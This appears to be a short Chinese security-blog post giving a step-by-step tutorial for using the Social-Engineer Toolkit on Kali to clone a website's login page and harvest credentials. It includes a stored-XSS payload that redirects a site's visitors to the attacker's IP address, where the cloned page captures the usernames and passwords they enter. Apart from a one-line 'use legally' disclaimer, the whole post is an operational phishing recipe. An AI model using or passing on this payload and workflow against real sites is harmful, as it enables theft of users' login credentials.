书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你。。。
今天给大家介绍一款克隆网站工具:setoolkit
一、环境:kali 2019.04
二、用法:
1、打开终端,输入setoolkit
2、选择Social-Engineering Attacks
3、选择Website Attack Vectors
4、选择Credential Harvester Attack Method
5、选择Site Cloner,输入要克隆的网址
6、构造存在xss漏洞的payload,在存储型xss漏洞处输入下面脚本,提交
<script>window.location="http://192.168.152.171"</script>
7、自动跳转到我们克隆的界面
8、随便输入账号,提交
9、在kali机看到输入的账号和密码
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库